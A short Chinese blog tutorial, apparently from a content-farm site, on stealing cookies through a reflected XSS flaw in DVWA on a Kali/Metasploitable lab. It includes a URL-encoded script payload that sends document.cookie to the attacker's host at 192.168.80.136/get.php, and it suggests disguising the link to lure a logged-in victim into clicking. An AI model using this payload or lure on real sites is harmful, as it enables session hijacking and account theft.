如何利用XSS漏洞获取对方cookie


这篇文章主要讲解了“如何利用XSS漏洞获取对方cookie”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何利用XSS漏洞获取对方cookie”吧!(1)环境搭建kali linux:192.168.80.136
目标win7: 192.168.80.130Metasploitable:192.168.80.129cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777): (2)XSS漏洞利用 目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:(3)查看cookie 切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。(4)进一步利用 目标提交后可以在地址栏看到如下URL:http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E# 可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。感谢各位的阅读,以上就是“如何利用XSS漏洞获取对方cookie”的内容了,经过本文的学习后,相信大家对如何利用XSS漏洞获取对方cookie这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是云编程开发博客,小编将为大家推送更多相关知识点的文章,欢迎关注免费云主机域名

相关推荐: linux可不可以拷贝文件到u盘

这篇文章主要讲解了“linux可不可以拷贝文件到u盘”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“linux可不可以拷贝文件到u盘”吧! linux可以拷贝文件到u盘。方法:1、利用“fdisk -l”命令查看…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/02 13:23
下一篇 02/02 13:23